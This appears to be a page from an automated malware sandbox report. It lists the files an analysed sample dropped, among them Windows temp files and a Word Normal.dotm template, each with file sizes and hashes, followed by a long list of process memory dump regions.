Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bf63d88ed20849a90be76a16c85e5ea8

SHA1
6b94333b8d6ab7439a2043653e552d22a1dec99d

SHA256
4a302dfda2e89df03035895d27bdc3dd991e849328a0e6fba17d759282ca10c3

SHA512
c2e55a919e291fc06995880e74eab69298d558b7c90abb1b4db79f91b89ac2efb90b54fa7b7b960008d22be3e6aefd6bcd7e50652b75fe6583fb00a81410cc94

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab607A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar62A3.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
cf841fee3a28f850de227fda6ba009b1

SHA1
995fe9f24442cb63d48f0771f1ce0381c76f0a71

SHA256
416ef51677a5af52522254436fa677c4a6a72da96106bb7d181b117f9ba6095b

SHA512
e3154a5bd26431db59efa37a8d6ae28baba3bd81ef7e8192c93ad38a7b2a6d2158cc42e81f9b34332d966e0fb712477b863cf92c7263d3d60aa6477645350297

Download Submit
memory/1740-25-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-32-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-9-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-11-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-10-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-20-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-17-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-23-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-21-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-19-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-18-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-16-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-14-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-15-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-12-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-0-0x000000002FBC1000-0x000000002FBC2000-memory.dmp

Filesize
4KB

Download
memory/1740-28-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-30-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-33-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-13-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-31-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-29-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-27-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-26-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-24-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-34-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-156-0x0000000070BED000-0x0000000070BF8000-memory.dmp

Filesize
44KB

Download
memory/1740-155-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1740-46-0x0000000070BED000-0x0000000070BF8000-memory.dmp

Filesize
44KB

Download
memory/1740-47-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-50-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-8-0x0000000005DA0000-0x0000000005EA0000-memory.dmp

Filesize
1024KB

Download
memory/1740-7-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-6-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/1740-2-0x0000000070BED000-0x0000000070BF8000-memory.dmp

Filesize
44KB

Download
memory/1740-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2460-41-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/2460-40-0x000000001B420000-0x000000001B702000-memory.dmp

Filesize
2.9MB

Download